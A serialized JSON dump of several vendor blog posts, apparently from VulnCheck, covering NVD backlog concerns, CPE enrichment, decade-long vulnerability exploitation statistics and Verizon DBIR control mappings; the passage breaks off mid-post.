Backlog",{"slug":73309},"nvd-backlog-exploitation","\u002Fblog\u002Fnvd-backlog-exploitation",{"title":65394,"description":73307},"blog\u002Fnvd-backlog-exploitation",[33173],"h-AVc7KGBLpXLdcG9NM_M0NOykPL7NaESS9b6zX40tA",{"id":73316,"title":73317,"articles":7,"authors":73318,"body":73320,"date":73363,"description":73364,"extension":234,"image":7,"link":7,"meta":73365,"navigation":237,"path":73367,"seo":73368,"series":7,"stem":73369,"subtype":7,"tags":7,"__hash__":73370},"blog\u002Fblog\u002Fcve-community.md","Expanding Access to CVE Data - CVE Program’s CVE List added to VulnCheck Community",[73319],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73321,"toc":73359},[73322,73327,73330,73334,73347,73350,73352],[18,73323,73324],{},[68,73325],{":width":10862,"alt":319,"src":73326},"\u002Fblog\u002Fcve-community\u002Fvulncheck-community-cve.png",[18,73328,73329],{},"In recent months, as the NIST NVD has struggled to keep pace with the surging influx of CVEs, the CVE Program has advocated for consumers of CVE data to consider utilizing it as their primary source. This shift marks a departure from the traditional reliance on NIST NVD, which historically offered enriched CVE data in an easily navigable format. While both sources offer distinct advantages and drawbacks, the security community has underscored the need for more accessible ways to access CVE data.",[61,73331,73333],{"id":73332},"cve-program-cve-list-added-to-vulncheck-community","CVE Program CVE List Added to VulnCheck Community",[18,73335,73336,73337,73340,73341,73346],{},"To address this concern and enhance access to CVE data, VulnCheck has taken the initiative to provide the CVE Program's CVE list via VulnCheck API. Effective immediately, the CVE Program CVE List is freely accessible to the ",[47,73338,28667],{"href":40745,"rel":73339},[51]," using the VulnCheck API. Users can now retrieve CVE Program data via the ",[47,73342,73345],{"href":73343,"rel":73344},"https:\u002F\u002Fdocs.vulncheck.com\u002Findices\u002Findices-m-r#mitre-cvelist-v5",[51],"VulnCheck API index \"mitre-cvelist-v5\"",", as well as download the complete JSON through a backup of the data.",[18,73348,73349],{},"Now the security community is empowered with access to both NIST NVD and CVE Program data delivered through API using a single source, facilitating easy comparison and selection based on organizational needs. This is additional to VulnCheck KEV which offers visibility into over 2,350+ Known Exploited Vulnerabilities, enhancing the spectrum of available vulnerability intelligence.\nWe remain committed to providing the highest fidelity vulnerability intelligence to the community while ensuring consistent and reliable access.",[61,73351,202],{"id":201},[18,73353,73354,73355,59],{},"Organizations seeking dependable access to 400+ vulnerability sources are encouraged to explore ",[47,73356,73358],{"href":214,"rel":73357},[51],"VulnCheck's Exploit & Vulnerability Intelligence service",{"title":219,"searchDepth":220,"depth":220,"links":73360},[73361,73362],{"id":73332,"depth":220,"text":73333},{"id":201,"depth":220,"text":202},"2024-05-16","Given the security community's ongoing concerns about the reliability and performance of NIST's National Vulnerability Database, we recognized a growing need to address these challenges with alternative sources.",{"slug":73366},"cve-community","\u002Fblog\u002Fcve-community",{"title":73317,"description":73364},"blog\u002Fcve-community","-ikgnr2N5Yvi-Dp8cXsG5RWq5QPEk-5q_YbPVEEAp8I",{"id":73372,"title":73373,"articles":73374,"authors":73382,"body":73384,"date":72932,"description":73400,"extension":234,"image":7,"link":7,"meta":73636,"navigation":237,"path":73638,"seo":73639,"series":7,"stem":73640,"subtype":7,"tags":73641,"__hash__":73642},"blog\u002Fblog\u002Fstate-of-exploitation-a-decade.md","State of Exploitation - A Peek into the Last Decade of Vulnerability Exploitation",[73375,73379],{"title":73376,"source":61436,"link":73377,"date":73378},"Risky Biz News: Microsoft ties security goals to exec compensation","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-microsoft-ties-security-goals-to-exec-compensation\u002F?ref=risky-business-news-newsletter","2024-05-06",{"title":73380,"source":43755,"link":73381,"date":60948},"The fundamental problem preventing CIP compliance in the cloud today","https:\u002F\u002Fenergycentral.com\u002Fc\u002Fiu\u002Ffundamental-problem-preventing-cip-compliance-cloud-today",[73383],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73385,"toc":73619},[73386,73391,73394,73397,73401,73403,73406,73409,73412,73414,73418,73429,73433,73444,73448,73451,73454,73458,73462,73465,73469,73475,73478,73489,73493,73499,73502,73512,73516,73522,73525,73529,73536,73540,73543,73557,73561,73564,73577,73580,73583,73585,73593,73600,73608,73610,73612,73614],[18,73387,73388],{},[68,73389],{":width":10862,"alt":58618,"src":73390},"\u002Fblog\u002Fstate-of-exploitation-a-decade\u002Fvulns-exploitation-exploits.png",[18,73392,73393],{},"In this series, we will explore vulnerability disclosure and exploitation, drawing insights from VulnCheck’s Exploit and Vulnerability Intelligence service.",[18,73395,73396],{},"Our goal is to offer valuable perspectives for the security community, starting with an exploration of the last decade's trends in vulnerability disclosure, exploitation, weaponization and exploit availability from 2014 to 2023.",[1920,73398,73400],{"id":73399},"a-look-into-the-last-decade-of-vulnerability-exploitation-2014-2023","A Look into the Last Decade of Vulnerability Exploitation… 2014 - 2023",[61,73402,68327],{"id":68326},[18,73404,73405],{},"Over the past decade, security teams have faced unwavering persistence by threat actors, evolving their tactics in response to security measures. While credential compromise and phishing made up the historical bulk of threat actor activity, as security controls such as MFA have become more widely adopted, adversaries have shifted their tactics to expand their reach using the exploitation of vulnerabilities to gain initial access into an organization.",[18,73407,73408],{},"Mandiant's M-Trends 2024 Report highlights a significant shift towards exploiting vulnerabilities, with 38% of intrusions in 2023 initiated through exploitation[1] and Verizon’s 2024 Data Breach Investigations Report (DBIR), reports a massive 180% increase in vulnerability exploitation.[2]",[18,73410,73411],{},"As we analyze CVE data, a clear pattern emerges: a surge in vulnerability disclosure, publicly available exploits, and known exploitation. This exponential growth underscores the pressing urgency of vulnerability management.",[61,73413,43093],{"id":43092},[993,73415,73417],{"id":73416},"growth-trends","Growth Trends",[22,73419,73420,73423,73426],{},[25,73421,73422],{},"CVEs with known exploitation grew at a 19.7% annual growth rate.",[25,73424,73425],{},"CVE disclosure grew at a rate of 14.1% annual growth rate",[25,73427,73428],{},"CVEs with Publicly available Proof-of-Concept exploits grew at a rate of 11.8%",[993,73430,73432],{"id":73431},"exploitation-trends","Exploitation Trends",[22,73434,73435,73438,73441],{},[25,73436,73437],{},"1.1% of vulnerabilities are publicly known to have been exploited in the wild.",[25,73439,73440],{},"2% of vulnerabilities are known to be weaponized",[25,73442,73443],{},"31% of vulnerabilities have Proof-of-Concept Exploit Code",[61,73445,73447],{"id":73446},"the-rise-in-vulnerabilities-exploitation-and-poc-exploits","The Rise in Vulnerabilities, Exploitation and POC Exploits",[18,73449,73450],{},"Between 2014 and 2023, we witnessed a rapid escalation in vulnerabilities, publicly available exploits, and known exploitation. During this period, CVE disclosures surged at a 14.1% annual growth rate, unique CVEs with publicly available exploits increased by 11.8% annually, and the number of unique CVEs with known exploitation skyrocketed by 19.7% annually.",[18,73452,73453],{},"As the trend of increased vulnerability disclosure continues its rapid ascent, we note a similar rise in known exploitation and the availability of proof-of-concept exploits. This alignment serves as a clear indicator for security teams to anticipate a rise in known exploited vulnerabilities and the availability of POC exploit code.",[18,73455,73456],{},[68,73457],{":width":10862,"alt":58618,"src":73390},[61,73459,73461],{"id":73460},"zooming-in-known-exploited-vulnerabilities-weaponization-and-exploits","Zooming In: Known Exploited Vulnerabilities, Weaponization, and Exploits",[18,73463,73464],{},"Now let’s zoom further into the CVE data from 2014 and 2023 to get more perspective on exploitation, weaponization and the availability of Proof-of-Concept Exploits. This analysis offers foundational insights that can drive improved vulnerability prioritization outcomes.",[993,73466,73468],{"id":73467},"how-many-vulnerabilities-are-known-to-be-exploited-in-the-wild","How Many Vulnerabilities are Known to Be Exploited in the Wild?",[18,73470,73471],{},[68,73472],{":width":10862,"alt":73473,"src":73474},"Known to Be Exploited in the Wild","\u002Fblog\u002Fstate-of-exploitation-a-decade\u002Fknown-exploited-in-the-wild.png",[18,73476,73477],{},"Analysis using VulnCheck’s Know Exploited Vulnerabilities (KEV) catalog reveals that between 2014 and 2023, 1.1% of all published vulnerabilities were exploited in the wild. We highly recommend prioritizing known exploitation as an immediate and optimal starting point for addressing vulnerabilities, particularly those that pose the highest threat to an organization, especially when exposed to the internet.",[1925,73479,73480],{},[18,73481,73482,73488],{},[295,73483,73484],{},[47,73485,73487],{"href":2871,"rel":73486},[51],"VulnCheck Known Exploited Vulnerabilities Catalog"," is the most comprehensive index of publicly referenceable vulnerabilities known to be exploited in the wild and encompasses all data from CISA KEV. We offer this to the community at no cost.",[993,73490,73492],{"id":73491},"how-many-vulnerabilities-are-known-to-be-weaponized","How Many Vulnerabilities are Known to be Weaponized?",[18,73494,73495],{},[68,73496],{":width":10862,"alt":73497,"src":73498},"Known to be Weaponized","\u002Fblog\u002Fstate-of-exploitation-a-decade\u002Fweaponized.png",[18,73500,73501],{},"Expanding our analysis to encompass weaponized vulnerabilities uncovers that between 2014 and 2023, 2% of all disclosed vulnerabilities have been weaponized. Given their heightened risk, weaponized vulnerabilities naturally warrant prioritized attention for remediation, as they possess a high likelihood of being exploited in the wild, if not already.",[1925,73503,73504],{},[18,73505,73506,10515,73509,73511],{},[295,73507,73508],{},"What defines a weaponized vulnerability?",[1823,73510],{},"\nIt's one that has either been exploited in the wild or has an available exploit capable of delivering a significant payload.",[993,73513,73515],{"id":73514},"how-many-vulnerabilities-have-a-publicly-available-proof-of-concept-exploit","How many Vulnerabilities have a Publicly Available Proof-of-Concept Exploit?",[18,73517,73518],{},[68,73519],{":width":10862,"alt":73520,"src":73521},"POC Exploit","\u002Fblog\u002Fstate-of-exploitation-a-decade\u002Fpoc-exploit.png",[18,73523,73524],{},"Expanding our analysis to encompass vulnerabilities with a Proof-of-Concept (POC) exploit, we find that between 2014 and 2023, 31% of vulnerabilities have at least one POC exploit available.",[993,73526,73528],{"id":73527},"how-many-vulnerabilities-exploited-in-the-wild-have-a-publicly-available-proof-of-concept-exploit","How many Vulnerabilities Exploited in the Wild have a Publicly Available Proof-of-Concept Exploit?",[18,73530,73531,73535],{},[68,73532],{":width":10862,"alt":73533,"src":73534},"POC Exploit - KEV","\u002Fblog\u002Fstate-of-exploitation-a-decade\u002Fpoc-known-exploited-vulnerabilities.png","\nInterestingly, over the same period, 72.9% of vulnerabilities known to be exploited in the wild are associated with a POC exploit. This underscores that vulnerabilities with a known POC pose a significantly higher threat than those without. We will dive deeper into this correlation as we continue our research.",[993,73537,73539],{"id":73538},"considering-data-biases","Considering Data Biases",[18,73541,73542],{},"We all carry our own biases when it comes to data and it's interpretation, and I'd like to offer some perspective on our observations. The primary focus of this series is examining VulnCheck data, which is sourced from hundreds of indexes. However, it's important to acknowledge that data biases persist. Therefore, we welcome feedback and additional insights that broaden our understanding.",[18,73544,73545,73546,982,73551,73556],{},"For instance, Cyentia’s report, “Prioritization to Prediction: Volume 1”[3], noted that 2% of published vulnerabilities had observed exploits in the wild. This closely aligns with VulnCheck’s definition of weaponization, suggesting consistency in trends over time, albeit from an earlier time period. We'd like to explore other reports on exploitation more and remain open to collaboration so please share your thoughts on any other sources we can learn. Personally, I'd suggest exploring ",[47,73547,73550],{"href":73548,"rel":73549},"https:\u002F\u002Fwww.cisco.com\u002Fc\u002Fdam\u002Fen\u002Fus\u002Fproducts\u002Fcollateral\u002Fsecurity\u002Fvulnerability-management\u002Fp2p-vulnerability-management-report.pdf",[51],"Cyentia's Prioritization to Prediction Vol. 9",[47,73552,73555],{"href":73553,"rel":73554},"https:\u002F\u002Fwww.bitsight.com\u002Fsites\u002Fdefault\u002Ffiles\u002F2024-04\u002Fbitsight-a-global-view-of-cisa-kev-catalog.pdf",[51],"Bitsight's Global View of CISA KEV Catalog"," which I plan to draw comparisons with throughout this series when I have the chance.",[61,73558,73560],{"id":73559},"expanding-our-research","Expanding Our Research",[18,73562,73563],{},"The aim of this post has been to lay down foundational research on vulnerability disclosure, known exploitation, weaponized vulnerabilities, and vulnerabilities with Proof-of-Concept exploits. While I’m not offering an immediate silver bullet for vulnerability prioritization, my hope is that this series provides useful insights that will provide an evidence-based understanding into vulnerabilities and exploitation. We do know that focusing on remediating known exploitation and weaponized vulnerabilities offers a substantial return on investment and is a useful place to start, especially when they're internet-facing on initial access devices.",[18,73565,73566,73567,64672,73570,982,73573,73576],{},"For those eager to dive deeper, I encourage you to research along with me as we explore the vulnerability and exploitation landscape. You can start by utilizing ",[47,73568,28667],{"href":40745,"rel":73569},[51],[47,73571,1233],{"href":2871,"rel":73572},[51],[47,73574,40672],{"href":40670,"rel":73575},[51],". In our next post, we’ll prioritize exploring exploitation across 2023 at a deeper level.",[18,73578,73579],{},"Until then...",[18,73581,73582],{},"Cheers,\nPatrick",[18,73584,3080],{},[18,73586,73587,73588],{},"[1] ",[47,73589,73592],{"href":73590,"rel":73591},"https:\u002F\u002Fservices.google.com\u002Ffh\u002Ffiles\u002Fmisc\u002Fm-trends-2024.pdf",[51],"Mandiant M-Trends 2024 Special Report",[18,73594,73595,73596],{},"[2] ",[47,73597,73599],{"href":64319,"rel":73598},[51],"Verizon 2024 DBIR",[18,73601,73602,73603],{},"[3] ",[47,73604,73607],{"href":73605,"rel":73606},"https:\u002F\u002Flearn-cloudsecurity.cisco.com\u002Fvulnerability-management-resources\u002Fvmc\u002Fprioritization-to-prediction-volume-1",[51],"Prioritization to Prediction: Volume 1",[61,73609,202],{"id":201},[18,73611,205],{},[18,73613,208],{},[18,73615,211,73616,217],{},[47,73617,216],{"href":214,"rel":73618},[51],{"title":219,"searchDepth":220,"depth":220,"links":73620},[73621,73622,73626,73627,73634,73635],{"id":68326,"depth":220,"text":68327},{"id":43092,"depth":220,"text":43093,"children":73623},[73624,73625],{"id":73416,"depth":1266,"text":73417},{"id":73431,"depth":1266,"text":73432},{"id":73446,"depth":220,"text":73447},{"id":73460,"depth":220,"text":73461,"children":73628},[73629,73630,73631,73632,73633],{"id":73467,"depth":1266,"text":73468},{"id":73491,"depth":1266,"text":73492},{"id":73514,"depth":1266,"text":73515},{"id":73527,"depth":1266,"text":73528},{"id":73538,"depth":1266,"text":73539},{"id":73559,"depth":220,"text":73560},{"id":201,"depth":220,"text":202},{"slug":73637},"state-of-exploitation-a-decade","\u002Fblog\u002Fstate-of-exploitation-a-decade",{"title":73373,"description":73400},"blog\u002Fstate-of-exploitation-a-decade",[1280],"iOufMnkkvDOjahEE-bKNSAXDqyyObxpeLu25gf194xE",{"id":73644,"title":73645,"articles":7,"authors":73646,"body":73648,"date":73685,"description":73686,"extension":234,"image":7,"link":7,"meta":73687,"navigation":237,"path":73689,"seo":73690,"series":7,"stem":73691,"subtype":7,"tags":7,"__hash__":73692},"blog\u002Fblog\u002Fverizon-dbir-2024-mitre.md","Verizon's 2024 DBIR Report - Mapping Mitre Att&CK tactics and techniques to Incident Classification Patterns",[73647],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73649,"toc":73681},[73650,73654,73657,73661,73672,73674],[61,73651,73653],{"id":73652},"_2024-verizon-dbir-report-mitre-attck-tactics-and-techniques-mapped-to-incident-classification-patterns","2024 Verizon DBIR Report: Mitre Att&CK tactics and techniques mapped to incident classification patterns",[18,73655,73656],{},"Verizon's annual DBIR report maps incident classification patterns to the Mitre Att&CK tactics and techniques. This one-pager offers visibility into these controls for security practitioners, enabling them to focus on the highest priority controls most frequently involved in data breaches.",[73658,73659],"pdf-view",{"url":73660},"\u002Fblog\u002Fverizon-dbir-2024-mitre\u002Fmitre.pdf",[18,73662,73663,73664,55527,73667,73669,73670,59],{},"You can access the 2024 Verizon DBIR's full report ",[47,73665,305],{"href":64319,"rel":73666},[51],[1823,73668],{},"You can download a PDF version of the Verison DBIR CIS Controls Mapping ",[47,73671,305],{"href":73660},[61,73673,202],{"id":201},[18,73675,73676,73677,73680],{},"Are you interested in gaining broader visibility into vulnerability intelligence and exploitation? If so, VulnCheck's ",[47,73678,216],{"href":214,"rel":73679},[51]," provides the broadest coverage to gain early access into the known. Register and demo our data today.",{"title":219,"searchDepth":220,"depth":220,"links":73682},[73683,73684],{"id":73652,"depth":220,"text":73653},{"id":201,"depth":220,"text":202},"2024-05-02","Verizon's 2024 annual DBIR report incident classification patterns mapped to the Mitre Att&CK tactics and techniques.",{"slug":73688},"verizon-dbir-2024-mitre","\u002Fblog\u002Fverizon-dbir-2024-mitre",{"title":73645,"description":73686},"blog\u002Fverizon-dbir-2024-mitre","5jMndLWxed2kO7Uwugr1zzTwrNK7Z2w66YwkWXs8Zwk",{"id":73694,"title":73695,"articles":7,"authors":73696,"body":73698,"date":73000,"description":73731,"extension":234,"image":7,"link":7,"meta":73732,"navigation":237,"path":73734,"seo":73735,"series":7,"stem":73736,"subtype":7,"tags":7,"__hash__":73737},"blog\u002Fblog\u002F2024-verizon-dbir.md","Verizon's 2024 DBIR Report - Mapping CIS Controls to Incident Classification Patterns",[73697],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73699,"toc":73727},[73700,73704,73707,73710,73720,73722],[61,73701,73703],{"id":73702},"_2024-verizon-dbir-report-cis-contols-mapped-to-incident-classification-patterns","2024 Verizon DBIR Report: CIS Contols Mapped to Incident Classification Patterns",[18,73705,73706],{},"Verizon's annual DBIR report maps incident classification patterns to the Center for Internet Security's (CIS) Critical Security Controls. This one-pager offers visibility into these controls for security practitioners, enabling them to focus on the highest priority controls most frequently involved in data breaches. The controls in red highlights indicate controls added in 2024 that were not present in the 2023 DBIR report.",[73658,73708],{"url":73709},"\u002Fblog\u002Fverizon-dbir-2024\u002Fverizon-dbir-2024.pdf",[18,73711,73663,73712,14193,73715,73717,73718,59],{},[47,73713,305],{"href":64319,"rel":73714},[51],[1823,73716],{}," You can download a PDF version of the Verison DBIR CIS Controls Mapping ",[47,73719,305],{"href":73709},[61,73721,202],{"id":201},[18,73723,73676,73724,73680],{},[47,73725,216],{"href":214,"rel":73726},[51],{"title":219,"searchDepth":220,"depth":220,"links":73728},[73729,73730],{"id":73702,"depth":220,"text":73703},{"id":201,"depth":220,"text":202},"Verizon's annual DBIR report incident classification patterns mapped to the Center for Internet Security's (CIS) Critical Security Controls.",{"slug":73733},"2024-verizon-dbir","\u002Fblog\u002F2024-verizon-dbir",{"title":73695,"description":73731},"blog\u002F2024-verizon-dbir","O1wWg8321T8NC3RxYUiOaCD8rQcDsjMr203eif_2nLo",{"id":73739,"title":73740,"articles":7,"authors":73741,"body":73743,"date":73836,"description":73837,"extension":234,"image":7,"link":7,"meta":73838,"navigation":237,"path":73840,"seo":73841,"series":7,"stem":73842,"subtype":7,"tags":73843,"__hash__":73844},"blog\u002Fblog\u002Fnvd-cpe-update.md","VulnCheck's CPE Coverage Update (3-weeks after launch)",[73742],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73744,"toc":73830},[73745,73753,73756,73760,73766,73770,73775,73781,73785,73798,73801,73806,73813,73816,73822,73824],[18,73746,73747,73748,73752],{},"Three weeks ago, we introduced ",[47,73749,73751],{"href":72066,"rel":73750},[51],"VulnCheck CPE enrichment"," to support the security community while the National Vulnerability Database (NVD) has experienced delays in processing new vulnerabilities. CPE generation is crucial for vulnerability tools and security teams, facilitating the mapping of software vulnerabilities (CVEs) to products.",[18,73754,73755],{},"Since the launch of NVD++ with CPE enrichment three weeks ago, we've received numerous inquiries about VulnCheck CPE.",[61,73757,73759],{"id":73758},"q-are-you-truly-providing-cpe-to-the-community-at-no-cost","Q: Are you truly providing CPE to the community at no cost?",[18,73761,73762,73765],{},[295,73763,73764],{},"A:"," Yes, we are offering VulnCheck CPE enrichment as a community service, free of charge for organizations. As a commitment to the security community, we consider CPE a vital function and have decided to include it in both our community service NVD++ and our commercial service VulnCheck NVD.",[61,73767,73769],{"id":73768},"q-what-is-vulnchecks-cpe-coverage","Q: What is VulnCheck’s CPE coverage?",[18,73771,73772,73774],{},[295,73773,73764],{}," Our efforts have been concentrated on maximizing CPE coverage for mainstream vendors and products. Currently, we maintain 100% coverage of 46 CVE Numbering Authorities (CNAs) and generate CPE for 117 out of 181 CNAs. To provide better visibility into our coverage, we've created a data visualization tool.",[18,73776,73777],{},[68,73778],{":width":10862,"alt":73779,"src":73780},"VulnCheck NVD++ CPE","\u002Fblog\u002Fnvd-cpe-update\u002FVulnCheck-CPE-Coverage.png",[61,73782,73784],{"id":73783},"q-how-can-i-access-vulncheck-cpe-enrichment","Q: How can I access VulnCheck CPE Enrichment?",[18,73786,73787,73789,73790,73793,73794,59],{},[295,73788,73764],{}," VulnCheck CPE enrichment is accessible when you join the VulnCheck Community. You can sign up for a free community account ",[47,73791,305],{"href":40745,"rel":73792},[51],". Our documentation outlines how to access VulnCheck CPE ",[47,73795,305],{"href":73796,"rel":73797},"https:\u002F\u002Fdocs.vulncheck.com\u002Fcommunity\u002Fnist-nvd\u002Fschema",[51],[18,73799,73800],{},"Additionally, we've created a video to provide a guided walkthrough on accessing VulnCheck CPE enrichment.",[59905,73802],{"width":73803,"height":73804,"src":73805,"title":59911,"frameBorder":445,"allow":59907,"referrerPolicy":59909,"allowFullScreen":237},840,472.5,"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FmcWwqmxUrv8?si=W6fB3tC3xbq6HE2S",[18,73807,73808,73809],{},"We are actively working on expanding our automated CPE generation and refining accuracy in response to the NVD pause. If you have feedback or questions, please email us at ",[47,73810,73812],{"href":73811},"mailto:community@vulncheck.com","community@vulncheck.com",[18,73814,73815],{},"VulnCheck NVD++ provides the security community with a dependable alternative for maintaining a persistent connection to NIST NVD CVE data, empowering users with seamless and reliable access to this critical public resource.",[18,73817,73818,73819],{},"To learn more about VulnCheck NVD++, please visit: ",[47,73820,40670],{"href":40670,"rel":73821},[51],[61,73823,202],{"id":201},[18,73825,73826,73827,217],{},"Are you interested in exploring threat actors? Do you want to track the vulnerabilities they are exploiting in the wild? If so, VulnCheck's ",[47,73828,216],{"href":214,"rel":73829},[51],{"title":219,"searchDepth":220,"depth":220,"links":73831},[73832,73833,73834,73835],{"id":73758,"depth":220,"text":73759},{"id":73768,"depth":220,"text":73769},{"id":73783,"depth":220,"text":73784},{"id":201,"depth":220,"text":202},"2024-04-15","To help close the enrichment gap for CVEs in the “Awaiting Analysis\" status, VulnCheck generates CPEs from reliable sources and has made them available through our NVD++ service as “vcConfigurations”.",{"slug":73839},"nvd-cpe-update","\u002Fblog\u002Fnvd-cpe-update",{"title":73740,"description":73837},"blog\u002Fnvd-cpe-update",[33173],"5Lb36k7XES0sS0k-Mc_In5VSlw4GhTOauOEqFfFEzaY",{"id":73846,"title":73847,"articles":7,"authors":73848,"body":73850,"date":73968,"description":73969,"extension":234,"image":7,"link":7,"meta":73970,"navigation":237,"path":73972,"seo":73973,"series":7,"stem":73974,"subtype":7,"tags":73975,"__hash__":73976},"blog\u002Fblog\u002Fnvd-cpe.md","Enhancing Access to NIST NVD data... Introducing CPE Enrichment in VulnCheck NVD++",[73849],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73851,"toc":73960},[73852,73857,73860,73864,73867,73870,73874,73877,73891,73895,73898,73901,73904,73908,73911,73922,73929,73932,73936,73939,73942,73946,73948,73953,73955],[18,73853,73854],{},[68,73855],{":width":10862,"alt":73779,"src":73856},"\u002Fblog\u002Fnvd-cpe\u002Fnvd-cpe.png",[18,73858,73859],{},"The National Vulnerability Database (NVD) is a crucial resource to the cybersecurity community, offering vital insights into vulnerabilities pinpointed through the Common Vulnerability Enumeration (CVE) program. Yet, recent changes at the National Institute of Standards and Technology (NIST) have hindered the timely processing of CVE data and the inclusion of essential enrichment, resulting in a discernible gap. This has spurred a collaborative endeavor to address the issue, ensuring the seamless continuation of vulnerability management efforts.",[61,73861,73863],{"id":73862},"the-rise-and-pause-of-nvd-a-turning-point","The Rise and Pause of NVD: A Turning Point",[18,73865,73866],{},"Over the last decade, the CVE program has seen a consistent increase in reported vulnerabilities annually. The NIST NVD's primary objective is to collect, refine, enhance, and disseminate information on all disclosed CVEs as a public service. The surge in volume has necessitated a corresponding expansion in NIST's operational capabilities to ensure analysis occurs at the required speed for response by vulnerability management and security teams. In particular, the analysis produces CVE enrichment including vulnerable configurations with CPEs, CVSS scores\u002Fmetrics, CWE classifications, and Reference citations.",[18,73868,73869],{},"However, the unexpected pause in NVD's operations for CVE analysis and enrichment is causing concern in the cybersecurity community, jeopardizing many established processes and workflows for vulnerability management and response. What was once a reliable source of vulnerability data has recently lapsed in its pace of publication, leaving organizations struggling to find a replacement.",[61,73871,73873],{"id":73872},"key-enrichment-data","Key Enrichment Data",[18,73875,73876],{},"The pause in NVD's operations has delayed them adding several types of vulnerability enrichment, creating a growing backlog of newly disclosed CVEs linger in the AWAITING ANALYSIS status:",[22,73878,73879,73882,73885,73888],{},[25,73880,73881],{},"Common Vulnerability Scoring System (CVSS) Metrics\u002FScoring: The universal baseline for quantitatively measuring vulnerability Severity. This is the essential starting point for calculating temporal scores and other more advanced methods for prioritizing vulnerabilities.",[25,73883,73884],{},"Common Platform Enumeration (CPE) : The globally accepted method of declaring which vendors, products, versions, builds, hotfixes and affected platforms are affected by a given CVE expressed as “Known Affected Software Configurations”. Without this essential information, detecting and measuring exposure to known vulnerabilities is impossible.",[25,73886,73887],{},"References: URLs provided as supplemental information, offering additional context and insights into a CVE, including Vendor advisories and fix notifications, known exploit methods and POCs, media coverage and technical briefs. These enable practitioners to classify vulnerabilities and make informed decisions about priority and response..",[25,73889,73890],{},"Common Weakness Enumeration (CWE): Abstracts the vulnerability’s underlying weaknesses, helping with categorization, impact analysis, association with CAPEC and Mitre ATT&CK techniques, aiding analysis and mitigation..",[61,73892,73894],{"id":73893},"stepping-up-vulnchecks-response","Stepping Up: VulnCheck's Response",[18,73896,73897],{},"VulnCheck has emerged as a widely recognized source of community-accessible vulnerability intelligence, and is dedicated to ensuring publicly available information about known vulnerabilities is available to all. As part of this commitment, VulnCheck launched NVD++ on March 13, 2024, a Community-accessible service providing timely access to NIST NVD data, ensuring uninterrupted support for vulnerability management efforts.",[18,73899,73900],{},"To help close the enrichment gap for CVEs in the “Awaiting Analysis’ status,\nVulnCheck prioritized the generation of CPEs from reliable sources and has started adding them into the JSON available through our NVD++ service as “vcConfigurations”. Our initial release closes the gap by close to half of the current CVEs missing critical CPE data, starting with the majority of the highest prevalence vendors and products where vulnerability management teams lack the data to measure local exposure.",[18,73902,73903],{},"Our research team is investigating additional sources and prioritizing accuracy over quick coverage to expand CPE correlation in the coming weeks.",[61,73905,73907],{"id":73906},"how-to-use-vulncheck-cpe","How to use VulnCheck CPE",[18,73909,73910],{},"The CPE data is represented as \"vcConfigurations\" and in a distinct CPE list in \"vulnerableCPEs\", in the following VulnCheck API indexes:",[22,73912,73913,73916,73919],{},[25,73914,73915],{},"nist-nvd2 - NVD 2.0 format, including essential data available to the VulnCheck Community tier",[25,73917,73918],{},"nist-nvd - NVD 1.0 format, including essential data available to the VulnCheck Community tier",[25,73920,73921],{},"VulnCheck-nvd2 - NVD 2.0 format, including premier Vulnerability & Exploit Intelligence available to VulnCheck customers",[18,73923,73924,73925],{},"Example CPE Data:\n",[68,73926],{":width":10862,"alt":73927,"src":73928},"VulnCheck CPE Example","\u002Fblog\u002Fnvd-cpe\u002Fvulncheck-cpe.png",[18,73930,73931],{},"The CPE data is available for both community NVD++ and Commercial feeds. We only ask that Community user’s provide attribution to VulnCheck when our CPE data is used within another product or service.",[61,73933,73935],{"id":73934},"vulncheck-cpe-coverage","VulnCheck CPE coverage",[18,73937,73938],{},"All the vendor \u002F product \u002F version information we harvest is CNA provided via Mitre 5.0. All the cpe are based off of CNA provided cpe or cpe we found that matched the vendor \u002F product in NVD. We also do cpe unrolling (where possible), which we think is a big deal.",[18,73940,73941],{},"At the current time of publishing this post VulnCheck’s CPE data covers 20% of CVE’s across the full NVD, and 40% of CVE’s awaiting coverage and we will continue to approach on these numbers as we expand our CPE coverage.",[18,73943,73944],{},[68,73945],{":width":10862,"alt":73779,"src":73856},[18,73947,73815],{},[18,73949,73818,73950],{},[47,73951,40670],{"href":40670,"rel":73952},[51],[61,73954,202],{"id":201},[18,73956,73826,73957,217],{},[47,73958,216],{"href":214,"rel":73959},[51],{"title":219,"searchDepth":220,"depth":220,"links":73961},[73962,73963,73964,73965,73966,73967],{"id":73862,"depth":220,"text":73863},{"id":73872,"depth":220,"text":73873},{"id":73893,"depth":220,"text":73894},{"id":73906,"depth":220,"text":73907},{"id":73934,"depth":220,"text":73935},{"id":201,"depth":220,"text":202},"2024-03-25","To help close the enrichment gap for CVEs in the “Awaiting Analysis’ status, VulnCheck prioritized the generation of CPEs from reliable sources and has started adding them into the JSON available through our NVD++ service as “vcConfigurations”.",{"slug":73971},"nvd-cpe","\u002Fblog\u002Fnvd-cpe",{"title":73847,"description":73969},"blog\u002Fnvd-cpe",[33173],"27M_pHx-4KUTjw5IJW1m3D7KGezjL4CmacdwcIjDo3U",{"id":73978,"title":73979,"articles":7,"authors":73980,"body":73982,"date":74091,"description":73992,"extension":234,"image":7,"link":7,"meta":74092,"navigation":237,"path":74094,"seo":74095,"series":7,"stem":74096,"subtype":7,"tags":74097,"__hash__":74098},"blog\u002Fblog\u002Fnvd-plus-plus.md","Enhancing Access to NIST NVD data... Introducing VulnCheck NVD++",[73981],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73983,"toc":74085},[73984,73990,73993,73997,74003,74009,74015,74022,74028,74034,74038,74041,74046,74050,74053,74059,74065,74071,74073,74078,74080],[18,73985,73986],{},[68,73987],{":width":10862,"alt":73988,"src":73989},"NVD Gap","\u002Fblog\u002Fnvd-plus-plus\u002Fnvd-gap.png",[18,73991,73992],{},"Given the security community's ongoing concerns about the reliability, rate limits, and performance of NIST's National Vulnerability Database (NVD) 2.0 API, we recognized a growing need to address these challenges.",[61,73994,73996],{"id":73995},"top-challenges-with-nist-nvd","Top Challenges with NIST NVD",[18,73998,73999,74002],{},[295,74000,74001],{},"Reliability:"," Users often encounter issues with the NIST NVD API finding it 